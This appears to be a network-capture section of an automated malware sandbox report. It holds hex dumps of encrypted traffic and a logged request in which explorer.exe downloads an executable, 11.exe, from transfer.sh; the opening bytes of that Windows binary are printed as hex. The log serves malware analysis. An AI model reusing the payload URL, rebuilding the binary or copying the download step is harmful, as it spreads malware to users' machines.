                                                                                                                                  2022-01-11 22:38:59 UTC1172INData Raw: 37 82 5d 30 36 ad df 55 44 75 1c 63 69 5d 0d c5 4c 12 03 b9 00 bb 91 af 21 dd 7a a1 3c ea 8a 68 6c e2 d1 ed ac 06 ac 10 8b 3c 27 36 90 26 bf 00 d2 ef ce 4f e8 6d 8a b4 d4 6c de fa 7a cb 76 c0 1d 07 9d 7b 16 6b 9c d0 82 83 96 b9 ba a8 c1 d2 f6 d6 ce 39 b0 30 a6 19 e1 2a e3 44 00 c5 c9 6d 16 5d 1c 3c aa 79 cc 75 fc af 27 f1 46 0d 56 2b 8f 28 3c 38 20 be b5 e9 7e 62 c9 75 b8 5a f5 82 c8 ae af 18 48 46 36 77 d1 f0 60 67 1a c8 29 21 5b 9d b3 05 77 85 c6 54 19 07 7c d9 b4 68 45 e2 44 0e b3 5c 7d 68 ee a5 ef 89 02 59 f0 70 de 2b 51 09 ff a6 31 9a d2 74 3c ab 3c fc 33 fa b3 67 42 48 6a b6 16 bc e4 17 09 a1 a5 e0 96 df d5 2b 53 18 29 0e 71 84 b9 e1 4d 54 ac f8 b3 ce 4c ce fe 51 e9 75 a5 ea 28 ed f1 5b fc 22 67 64 a1 db ea 21 c6 54 e0 06 d4 6a 2a bd b2 58 55 ef 07
                                                                                                                                  Data Ascii: 7]06UDuci]L!z<hl<'6&Omlzv{k90*Dm]<yu'FV+(<8 ~buZHF6w`g)![wT|hED\}hYp+Q1t<<3gBHj+S)qMTLQu(["gd!Tj*XU
                                                                                                                                  2022-01-11 22:38:59 UTC1180INData Raw: d0 b5 31 da f7 8c ea 3d 26 55 aa 89 cc 16 21 58 73 08 3b cd b3 3d 1f 95 eb fe 7c 6e da 29 f4 f1 c5 a2 0c 07 15 28 02 04 34 76 ab c7 6b 43 a3 99 3f 9b 3a 86 1a c8 96 26 d7 50 85 73 c2 0e e7 af 84 d4 0f 47 62 fc 0c 90 42 e5 28 84 92 a9 b5 42 a4 13 7d 4c 6c b1 b9 e1 13 4b 72 28 93 3a e4 b3 f1 81 05 86 97 11 0f 5d 6d 86 ed 34 dd b1 26 27 eb c5 5f df 8e ff 29 9c 83 b9 3e 23 55 dc 27 9c a9 19 22 4a 30 b5 ea 99 d7 aa 8d de 72 03 38 cd 9d 3d ba 28 95 e3 31 6a b9 19 21 13 52 ab 7c b5 36 3f e3 65 15 db ab 94 0b 2d 0e f0 af e8 f3 4f b3 37 20 8c d7 3d 16 c0 2a 80 54 83 b2 12 66 f6 eb ee 9a 54 ee 65 c1 11 09 a8 4a 40 33 0c db 61 f1 cd 7f f7 ba 9d 57 f9 68 7a c9 8b b5 e7 70 e8 d3 d4 04 2f d1 5d 75 04 eb da d6 c6 03 c5 ee 45 18 97 4b 46 cc a8 64 14 6f 60 99 91 65 ff 99
                                                                                                                                  Data Ascii: 1=&U!Xs;=|n)(4vkC?:&PsGbB(B}LlKr(:]m4&'_)>#U'"J0r8=(1j!R|6?e-O7 =*TfTeJ@3aWhzp/]uEKFdo`e
                                                                                                                                  2022-01-11 22:38:59 UTC1188INData Raw: 17 40 e6 6e 8e df 58 11 72 d7 e4 69 c1 91 02 cb 1c 22 40 8c cb ec 50 40 9c 00 7f 18 58 66 d7 e2 e1 08 d2 3c 53 a4 58 8f 23 e9 c5 27 42 2a 58 12 18 6f 64 96 39 57 36 c3 40 6b 5b 4e fd 3f 44 ab f6 9d b6 0a ce 75 94 05 65 ec 4e 32 d9 35 72 a5 7e 3b 9b 75 19 b1 39 ae 67 86 ce 53 f7 02 9c 00 a5 3e 8c cf d8 49 39 7a f9 a2 c3 59 c8 17 e0 a6 d4 03 43 6a 67 50 f9 78 d0 b0 c4 25 85 ed c9 61 bd b8 78 63 62 f2 4a a3 d8 e7 4c 9d 07 71 3b 0a 9b 8b e0 bd 7e c2 e7 ef 7e 1e 10 7d 9b b6 f4 c0 66 ec ef 2f 54 36 03 6e 5d 44 44 65 3f 82 92 c8 b3 6a 15 d4 36 14 c7 ea f6 5e d7 26 86 68 b4 05 c2 ef f9 db 68 41 bd 02 1f df 17 4b d3 aa cc 02 aa 2d 4d 1f 6e 00 91 cf a7 b6 e5 e6 0e a2 08 38 c1 4b ad 35 dd bb bc 66 0e 8e 08 7d ca ce 71 19 be 8f 5a e9 70 f3 80 c2 bb 37 0d 2c 0e c1 dd
                                                                                                                                  Data Ascii: @nXri"@P@Xf<SX#'B*Xod9W6@k[N?DueN25r~;u9gS>I9zYCjgPx%axcbJLq;~~}f/T6n]DDe?j6^&hhAK-Mn8K5f}qZp7,
                                                                                                                                  2022-01-11 22:38:59 UTC1196INData Raw: c4 2c 93 ed 0a 1a c6 91 a3 ab 0d 6e 88 5e c7 39 05 ba e2 eb 6d 46 b7 c9 b1 c2 ee ee c2 a3 5a ae 5a ef 75 7e 38 83 d5 3d d7 91 39 ba ec 1e 40 46 e8 c5 cc 83 bf e6 8c 49 de 17 22 8c 89 94 f2 68 e4 f8 de 05 29 a6 16 1b 4d 55 fb 78 70 da 7e c6 65 04 f6 0e 5f 40 b6 ca b2 a3 9c b3 bc 50 bf ab 36 47 2a 94 03 0c 85 6f c5 4a b9 da 70 ff 17 bb 9d 24 53 81 47 c2 0f de f3 0f 2f a9 fc 3f c9 16 3c 8c 27 dd 1f 43 e0 ef 29 34 4c d5 38 9d 42 66 76 b4 81 ed 32 b7 08 30 4d cc 73 2e 86 c9 25 3b 7f 38 94 08 9d 72 c7 f6 24 aa fb 89 66 51 0a 8a 60 ed f3 d6 36 53 c0 20 71 ee 6d 76 a2 a5 e6 90 0b c7 33 7d 60 93 7f fb 66 5b 42 fa 18 04 cb d4 d3 52 6c fe bd e1 fa ab e9 2b 52 82 de ca 8c 2a 04 99 27 15 44 3e dc 43 f2 43 f4 4f 89 69 d5 40 3f be 7c 05 aa 30 8b 80 a5 6d cf 6e e2 a1 71
                                                                                                                                  Data Ascii: ,n^9mFZZu~8=9@FI"h)MUxp~e_@P6G*oJp$SG/?<'C)4L8Bfv20Ms.%;8r$fQ`6S qmv3}`f[BRl+R*'D>CCOi@?|0mnq
                                                                                                                                  2022-01-11 22:38:59 UTC1203INData Raw: bd 88 28 32 22 e8 58 4c 83 7f f5 97 67 ae 7a 0d f9 fc ad 42 9a d8 17 6f 0f af a3 59 f7 32 c4 20 61 5c b0 ab 10 7d 94 fe 22 54 2f 36 fe 8a ef 32 de 74 24 2a 66 97 51 b8 98 9b ab ca 60 bb 45 7a 12 ff 42 c2 cd 4e ee a1 44 24 bd 6a 85 a0 02 6e 39 69 3c ae c5 81 7f df 5b 98 da 85 aa c6 c9 cc 8c 83 ff 23 b8 9d 21 32 16 ae e1 52 48 d8 f9 b3 42 bf 46 ce d3 ac 61 a5 71 de 41 31 97 9d 57 49 68 a2 92 a4 b1 7c 9b 26 49 36 4d 82 88 f8 d0 8c 7a 3b 75 b7 7b 01 c2 58 7a 4f 25 3b 7f 90 28 2f d1 60 fc ed 06 29 de e8 17 2d 3e 86 b0 51 22 93 72 3b 1f 56 51 5e 47 7f 61 16 ad 94 06 05 02 bf 8c 34 85 9f 44 47 cf 67 88 12 df 9b 10 9e 39 96 1d 1b 06 13 d9 1f dc 08 18 9f f3 20 85 39 ef ec c9 0e 01 d2 d5 e2 cb 00 c4 d1 ba 3a 00 74 b2 8f 19 5b 1b c1 91 0d 69 21 cc 6d 47 be 23 68 16
                                                                                                                                  Data Ascii: (2"XLgzBoY2 a\}"T/62t$*fQ`EzBND$jn9i<[#!2RHBFaqA1WIh|&I6Mz;u{XzO%;(/`)->Q"r;VQ^Ga4DGg9 9:t[i!mG#h
                                                                                                                                  2022-01-11 22:38:59 UTC1211INData Raw: 5f 8b d1 56 c6 82 87 d1 5d ff 39 f9 bf f2 67 4a 9f 9b 4b 37 84 8e 0c fd ae bd 97 ae a4 5f 90 43 cf a4 fe 63 38 dd 56 6f 28 e2 cc 8a e2 7b b7 59 7b 9d 27 36 b2 cf 6b dd f4 f7 1d 00 12 e9 1c a4 fc 03 77 b8 ab cc 3a c9 ea 07 5f 2f 0d 8b 52 09 bc 3a ec 27 15 d4 df b5 65 93 d9 dc 67 a0 01 56 21 56 dd 43 51 28 a6 dd 39 8c f5 8c 4b be 40 ee 61 a4 d3 4c 38 84 a8 ee bc 26 fd 69 ea 8b 07 ba 07 43 7a 8a b3 a7 3d 28 bb 94 b7 da 20 9e 4d 4d bb 5e fc 01 7e 85 71 2b 50 78 82 e9 ca ec f1 0d 2f d6 a1 59 11 04 4f df e1 0d 84 47 17 31 5d da 2d 81 03 d3 94 d5 a9 47 78 c9 5b 0e 38 da 64 73 27 28 19 e7 5f 88 74 02 68 5c 63 88 ec 37 26 8a ec 35 4c fc 8a 88 ea 92 2e 4a 9c c9 55 6f 63 b5 1e f2 97 7e ea 19 12 dc b9 a2 91 cf 83 1d 8e 2a 76 dc 63 cc 3b 87 5d a7 a4 4e 0d 66 5a 6a ef
                                                                                                                                  Data Ascii: _V]9gJK7_Cc8Vo({Y{'6kw:_/R:'egV!VCQ(9K@aL8&iCz=( MM^~q+Px/YOG1]-Gx[8ds'(_th\c7&5L.JUoc~*vc;]NfZj
                                                                                                                                  2022-01-11 22:38:59 UTC1219INData Raw: d0 0a 69 37 1a 2c ea f7 1a a4 c8 52 92 d9 2e 20 70 bc f4 26 b9 45 5e 28 57 e3 d0 aa 57 af c1 28 54 c6 ad ea b3 fe ee 8a 05 a6 21 f5 04 f4 e7 b1 09 fd f2 f1 48 91 56 48 d9 05 0b e2 bd 68 2b 47 eb 6d e2 7c 92 fb bb 40 41 75 84 ab 96 80 b1 9c a9 28 d7 db df 40 07 9c d4 48 cb 52 3c 0c bf 1a c4 cf 7a d2 c2 46 c0 bf 21 e4 2c df 65 53 86 0f 7d fa c9 a1 4e 4a 91 06 73 20 36 59 11 ca 4b 79 43 6d a0 79 13 20 25 40 60 9a 25 99 cf 98 c5 d0 3c 57 26 46 a9 51 6d 6d 18 54 05 09 86 f7 6e d7 2f f0 a5 54 a6 b5 a2 5c 3e fe 58 f9 3a d7 31 fa b6 5e ff 24 9e 5a f9 87 ae f3 1e 77 bd 10 a9 3c fe c7 2f 0d 96 bc 1e 37 e0 6b 01 09 95 5a 63 c0 be 14 05 ed d3 38 5f 63 e5 10 01 0b fc ed 3a d3 c5 d1 36 62 83 09 e3 98 93 02 a0 89 43 49 f2 60 b2 c0 e9 09 e2 b7 fb 8b 11 ef d8 e8 2b b4 fc
                                                                                                                                  Data Ascii: i7,R. p&E^(WW(T!HVHh+Gm|@Au(@HR<zF!,eS}NJs 6YKyCmy %@`%<W&FQmmTn/T\>X:1^$Zw</7kZc8_c:6bCI`+
                                                                                                                                  2022-01-11 22:38:59 UTC1227INData Raw: d5 9e 08 4a 19 b5 06 c1 84 a1 d3 6f e6 df 01 b6 94 11 2d 62 79 04 d2 92 e6 76 9f 10 ef 75 e8 fc 0a bf d8 1f 4e 2e 25 fb 07 48 62 b5 64 6e 49 e8 e6 74 46 65 42 4c e2 c7 e8 bf f3 95 21 ff e9 81 de b6 51 bd 93 72 77 9c e1 aa 58 f4 a1 a3 69 ca 26 b4 a4 71 40 ff 59 02 25 0a 03 b6 e0 1e 70 d3 a0 86 5e 75 07 cf 47 fe 25 72 d1 af 6d 28 91 0e 18 f6 b7 c4 6a 41 95 86 05 6a cc 4f e5 1d f1 28 31 46 bf 5e 36 f4 ef b3 f1 e9 f1 94 1b b3 aa f5 3c 2a 60 24 56 7a f1 7c 4f 65 66 33 a6 8e f5 a1 aa 5d 14 a8 8c b2 ca 59 7b 02 f5 62 7e 70 36 96 73 5d 52 89 29 a9 16 5b 27 c7 73 a7 74 e9 12 06 13 ee 38 fa 82 46 ad 9e 11 bd d8 11 82 8b 6f 73 81 64 11 d5 b5 62 c8 c8 63 24 45 c7 92 e4 11 0b f7 55 cd c7 32 0d 37 59 e1 b9 3e 80 2b 2b 9b d2 ef c5 ff 6c ac 33 9d 73 5c 83 d3 0b a3 af 1a
                                                                                                                                  Data Ascii: Jo-byvuN.%HbdnItFeBL!QrwXi&q@Y%p^uG%rm(jAjO(1F^6<*`$Vz|Oef3]Y{b~p6s]R)['st8Fosdbc$EU27Y>++l3s\
                                                                                                                                  2022-01-11 22:38:59 UTC1235INData Raw: 75 e6 df 18 12 4f f6 89 bb df d3 06 27 54 7e 0b 3f 67 6e b9 f8 c4 4e 67 19 63 4e b0 e6 75 63 46 1e 46 76 32 32 32 32 32 32 32 32 32 32 32 32 32 59 a1 3b 42 42 42 42 33 f9 33 16 16 16 16 16 e8 e8 7a 7a 7a 7a 7a 72 72 6f 8a 6f 3a e8 6f e8 e8 e8 e8 77 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff c0 00 00 00 3f 00 00 ff c0 00 00 00 3f 00 00 ff c0 00 00 00 3f 00 00 ff c0 00 00 00 3f 00 00
                                                                                                                                  Data Ascii: uO'T~?gnNgcNucFFv2222222222222Y;BBBB33zzzzzrroo:ow2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222????
                                                                                                                                  2022-01-11 22:38:59 UTC1242INData Raw: a0 a3 d3 a6 aa 9f d6 ab 9c 9c ce a4 b2 aa d6 ce c6 be de d3 cb c6 d1 80 82 7f cf 80 83 7e 98 dd c9 95 3c d4 c9 99 45 d3 ca 94 36 da ca a5 27 00 00 00 00 7e e7 90 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e7 b2 99 2c d8 bc 9d 41 d7 c8 a1 2b c9 c7 99 35 c1 c9 a3 3d 7e 7c 83 9d 7e 81 7f d4 cb d1 cf d0 d6 c6 d2 c8 9f 9c 9f d3 98 99 a0 d4 9d a4 9a da a8 a2 a2 cd a4 9d 99 e0 9a 9f a4 cd b3 b7 b2 d6 b0 b0 a2 d7 b3 ae a3 da ac a8 8d ca a3 a6 a8 df a6 9d 97 e2 a6 9a 9d d4 97 ab 96 d5 9e a8 95 cd a6 ac a6 d5 b3 ab 9f d0 a4 a5 aa da a8 ad 91 d4 ac 9c 9e d9 a3 a9 9f d7 a1 a2 9c ce a7 ac a1 d5 c7 b3 b7 dc d0 d7 c4 cd 7c 7f 86 e2 85 7f 82 9a d6 cd af 37 d7 cc b2 3b ca cc ae 3c c4 cb af 33 00 00 00 00 84 da 88 33 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: ~<E6'~2,A+5=~|~|7;<33
                                                                                                                                  2022-01-11 22:38:59 UTC1250INData Raw: 76 71 48 82 7f 7d 88 7c 83 7b e2 84 7a 7f d6 80 84 80 d6 84 7e 7e da 7e 7e 80 d9 83 81 7f d7 7f 7b 7a d4 7c 81 81 ce 7a 84 7f db 80 79 81 dd 7e 81 81 d0 82 84 83 d4 7f 7f 7b d4 7f 84 81 d7 7f 7e 82 cd 81 82 7d d5 7d 84 79 c8 83 82 84 7d 7f 7f 7f 2d ce cb a6 30 cf d2 b7 31 00 00 00 00 00 00 00 00 00 00 00 00 be e2 9e 2d c6 e0 9e 2c 82 db 88 2d 7f c8 9d 38 82 db 98 30 83 da 8e 2b 7e 7c 80 80 80 7e 7f d1 bf aa b8 d4 b9 b3 b7 dd b4 b2 b3 d3 ae b1 c9 d5 b2 b4 b7 dc cd b7 ae c9 ac bb b2 dd c9 bb b0 cc bb c2 bd d5 ba ba b6 d3 bf bb b7 d5 b0 b8 aa ce b9 be bb d9 c5 c6 be d2 c4 bf b3 da cc b3 b5 d1 a6 b2 a3 d0 81 7f 7f cc 78 7e 6f 6d d6 b5 9d 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 d6 9f 2b cd df 9a 37 c1 c5 9c 40 d3 ca a1 31 d8 b8 97 3c
                                                                                                                                  Data Ascii: vqH}|{z~~~~{z|zy~{~}}y}-01-,-80+~|~x~om.+7@1<
                                                                                                                                  2022-01-11 22:38:59 UTC1258INData Raw: 62 80 00 54 7f cd 00 51 4a 80 00 5d 7e da 00 40 4a 81 00 47 69 b2 00 7f 7f c1 00 6f 6e 81 00 7b 7f a0 00 56 80 a1 00 1e 19 20 00 3c 44 80 00 18 21 1f 00 7e 72 80 00 7f 7c 8c 00 60 5e 7f 00 6c 7e 89 00 4a 7f b1 00 1c 1e 1b 00 24 29 1f 00 2b 30 80 00 25 14 1f 00 5c 7f c3 00 1b 22 1c 00 19 21 21 00 56 7e b9 00 22 1d 16 00 65 81 d5 00 3e 33 7f 00 3f 69 7f 00 75 77 80 00 36 3b 7f 00 59 4a 7e 00 62 80 a2 00 3f 6a 9a 00 1d 1d 21 00 58 50 7f 00 6b 7f bc 00 47 3b 7e 00 53 80 b4 00 3c 3c 81 00 59 80 a5 00 5e 64 7f 00 68 4e 7e 00 58 6e 7f 00 80 80 7e 00 4c 72 a7 00 4e 7e 9f 00 54 5e 93 00 5c 5d 80 00 75 80 9c 00 7e 80 a6 00 4c 6d ac 00 80 88 bc 00 49 70 9e 00 3c 46 7e 00 7e 80 7f 00 7a 6f 80 00 1a 20 29 00 7f 86 de 00 25 22 22 00 4b 3f 7f 00 1c 20 1f 00 54 72 b8 00
                                                                                                                                  Data Ascii: bTQJ]~@JGion{V <D!~r|`^l~J$)+0%\"!!V~"e>3?iuw6;YJ~b?j!XPkG;~S<<Y^dhN~Xn~LrN~T^\]u~LmIp<F~~zo )%""K? Tr
                                                                                                                                  2022-01-11 22:38:59 UTC1266INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b 6e 90 00 9b 6e 90 00 3d 3c 80 c1 81 7e 85 bd c3 c3 cc c6 7f 7e c9 cc 68 7e be c5 6b 80 c9 ca 6d 80 d6 c3 6e 7e c6 cd 65 81 c9 bc 62 7f c5 c0 69 7f c0 c7 7c 7f c4 ca 78 80 bc c6 67 80 c2 c0 69 80 cc cd 70 80 cb c5 74 7e b6 cd 61 80 c0 cb 68 81 bc c4 64 80 a8 cc 4e 52 81 bc 4d 51 7e 7f a1 a1 c4 32 80 96 d4 3a a4 a5 cb 47 95 aa ba 48 97 9a bf 4a 90 8c bf 3f b4 a8 c3 3c ad a3 de 40 b1 b7 c8 43 a9 a4 d9 46 af 9f cd 37 a7 ac cb 46 b0 9b cb 3a af a3 c3 3a b9 a5 c6 37 b9 98 ce 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 49 80 ae 80 7f 80 c6 b2 c6 b7 c3 7f 80 b2 c1 69 7f cd c5 6a 7f c1 c1 6c 80 c4 c5 6a 80 bf c8 64 7f bf cc
                                                                                                                                  Data Ascii: nn=<~~h~kmn~ebi|xgipt~ahdNRMQ~2:GHJ?<@CF7F::76EIijljd
                                                                                                                                  2022-01-11 22:38:59 UTC1274INData Raw: ac cc 69 a0 b0 d2 59 a1 af cd 47 a7 ad c2 43 a4 b6 c6 4d a2 c2 cc 46 97 c5 c9 3e 9c c3 d2 3e 99 ca d3 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 81 80 35 80 80 7e 7f 7e 81 86 c3 80 8b c4 c4 66 7f c1 c3 74 81 c4 ca 6c 7f ca ce 81 80 c3 c0 7b 7f c0 cc 7d 7f cc c5 68 7f ce c9 7a 80 c7 cb 6e 7f b6 cf 6e 7f c4 c0 61 7f 80 c4 73 70 80 7f 9c b7 d5 56 98 b7 cc 60 98 af cb 63 9a af cc 64 a2 b2 be 5d b6 b8 cd 55 a0 b4 c8 54 ab a1 b7 43 ba 98 c7 36 a3 a0 c3 48 b0 9a c9 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f b8 db 2e 7e 7e 86 35 81 80 80 80 7e 80 94 c4 81 7f c3 cd 6d 7f cd c5 68 80 c6 cc 77 80 c9 c8 74 81 bf c5 7e 80 c5 d2 80 7e be bd 76 80 c6 be 7c 80 c3 c9 7c 80 c1 d1 71 7e c1 c0 59 7e 8e c4 5e 61 7e 7f 9f a0 d2 53 af bc ce 54
                                                                                                                                  Data Ascii: iYGCMF>>>`5~~ftl{}hznnaspV`cd]UTC6H7.~~5~mhwt~~v||q~Y~^a~ST
                                                                                                                                  2022-01-11 22:38:59 UTC1281INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  6192.168.2.549882144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-11 22:39:04 UTC1282OUTGET /get/ealX1m/11.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: transfer.sh
                                                                                                                                  2022-01-11 22:39:05 UTC1282INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.14.2
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:04 GMT
                                                                                                                                  Content-Type: application/x-ms-dos-executable
                                                                                                                                  Content-Length: 615936
                                                                                                                                  Connection: close
                                                                                                                                  Content-Disposition: attachment; filename="11.exe"
                                                                                                                                  Retry-After: Tue, 11 Jan 2022 23:39:08 GMT
                                                                                                                                  X-Made-With: <3 by DutchCoders
                                                                                                                                  X-Ratelimit-Key: 127.0.0.1,102.129.143.64,102.129.143.64
                                                                                                                                  X-Ratelimit-Limit: 10
                                                                                                                                  X-Ratelimit-Rate: 600
                                                                                                                                  X-Ratelimit-Remaining: 9
                                                                                                                                  X-Ratelimit-Reset: 1641940748
                                                                                                                                  X-Remaining-Days: n/a
                                                                                                                                  X-Remaining-Downloads: n/a
                                                                                                                                  X-Served-By: Proudly served by DutchCoders
                                                                                                                                  2022-01-11 22:39:05 UTC1282INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3e 58 8d 24 7a 39 e3 77 7a 39 e3 77 7a 39 e3 77 6e 52 e0 76 77 39 e3 77 6e 52 e6 76 dc 39 e3 77 6e 52 e7 76 6c 39 e3 77 28 4c e7 76 6b 39 e3 77 28 4c e0 76 6e 39 e3 77 28 4c e6 76 30 39 e3 77 6e 52 e2 76 7f 39 e3 77 7a 39 e2 77 1a 39 e3 77 c0 4c e6 76 7b 39 e3 77 c0 4c 1c 77 7b 39 e3 77 c0 4c e1 76 7b 39 e3 77 52 69 63 68 7a 39 e3 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$>X$z9wz9wz9wnRvw9wnRv9wnRvl9w(Lvk9w(Lvn9w(Lv09wnRv9wz9w9wLv{9wLw{9wLv{9wRichz9w
                                                                                                                                  2022-01-11 22:39:05 UTC1298INData Raw: 5e c3 56 8b f1 56 c7 06 b8 e1 46 00 e8 54 01 00 00 83 7e 18 00 59 74 09 ff 76 18 e8 29 61 00 00 59 83 66 18 00 c7 06 bc d2 46 00 5e c3 55 8b ec 53 8b d9 57 8b 7d 08 39 3b 74 3e 83 3b 00 74 08 ff 33 e8 02 61 00 00 59 83 23 00 85 ff 74 2a 80 3f 00 56 8b f7 74 06 46 80 3e 00 75 fa 2b f7 46 56 e8 d9 81 00 00 89 03 59 85 c0 74 0b 56 57 50 e8 03 33 00 00 83 c4 0c 5e 5f 8b c3 5b 5d c2 04 00 55 8b ec 56 8b f1 e8 76 ff ff ff f6 45 08 01 74 0a 6a 20 56 e8 99 20 00 00 59 59 8b c6 5e 5d c2 04 00 55 8b ec 51 6a 08 e8 55 20 00 00 89 45 fc 59 85 c0 74 10 8b 0d 14 d0 47 00 89 08 8b 4d 08 89 48 04 eb 02 33 c0 a3 14 d0 47 00 c9 c3 a1 1c d0 47 00 c3 6a 04 b8 fe 25 42 00 e8 e7 23 00 00 33 f6 8d 4d f0 56 e8 37 fc ff ff 8b 3d 1c d0 47 00 89 75 fc 85 ff 75 45 56 e8 3b 01 00 00
                                                                                                                                  Data Ascii: ^VVFT~Ytv)aYfF^USW}9;t>;t3aY#t*?VtF>u+FVYtVWP3^_[]UVvEtj V YY^]UQjU EYtGMH3GGj%B#3MV7=GuuEV;
                                                                                                                                  2022-01-11 22:39:05 UTC1314INData Raw: b6 42 fe 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 4e ff 0f b6 42 ff 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 75 02 33 c9 8b c1 5f e9 af 08 00 00 8b 46 e3 3b 42 e3 74 51 0f b6 f8 0f b6 42 e3 2b f8 75 18 0f b6 7e e4 0f b6 42 e4 2b f8 75 0c 0f b6 7e e5 0f b6 42 e5 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 4e e6 0f b6 42 e6 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 75 9f 8b 46 e7 3b 42 e7 74 55 0f b6 f8 0f b6 42 e7 2b f8 75 18 0f b6 7e e8 0f b6 42 e8 2b f8 75 0c 0f b6 7e e9 0f b6 42 e9 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 4e ea 0f b6 42 ea 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 42 ff ff ff 8b 46 eb 3b 42 eb 74 55 0f b6
                                                                                                                                  Data Ascii: B+t3MNB+t3Eu3_F;BtQB+u~B+u~B+t3MNB+t3EuF;BtUB+u~B+u~B+t3MNB+t3EBF;BtU
                                                                                                                                  2022-01-11 22:39:05 UTC1330INData Raw: 0c 53 8b 5d 14 8b d1 56 89 55 fc 8b 33 85 f6 75 0c e8 ad 0b 00 00 8b 55 fc 8b f0 89 33 8b 5d 08 8b 4d 0c 8b 06 03 cb 83 26 00 89 45 f8 89 4d f4 3b d9 74 52 57 8b 7d 10 0f b6 03 8b ca 50 e8 a3 fd ff ff 84 c0 75 26 8b 45 14 8b 00 85 c0 75 0a e8 6e 0b 00 00 8b 4d 14 89 01 83 38 2a 75 20 8b 4d fc 6a 3f e8 7d fd ff ff 84 c0 74 04 ff 07 eb 03 83 0f ff 8b 55 fc 43 3b 5d f4 75 bb eb 03 83 0f ff 8b 45 f8 5f 83 3e 00 75 06 85 c0 74 02 89 06 5e 5b c9 c2 10 00 8b ff 55 8b ec 8b 4d 0c 8d 41 01 3d 00 01 00 00 77 0c 8b 45 08 0f b7 04 48 23 45 10 5d c3 33 c0 5d c3 8b ff 55 8b ec 83 ec 38 8b 45 1c 8b 4d 10 8b 55 14 89 45 ec 8b 45 18 89 45 f4 8b 45 08 89 45 dc 8b 45 0c 89 55 f0 89 4d f8 89 45 e0 85 c9 75 15 e8 d5 0a 00 00 c7 00 16 00 00 00 e8 9e df ff ff 83 c8 ff c9 c3 85
                                                                                                                                  Data Ascii: S]VU3uU3]M&EM;tRW}Pu&EunM8*u Mj?}tUC;]uE_>ut^[UMA=wEH#E]3]U8EMUEEEEEEUMEu
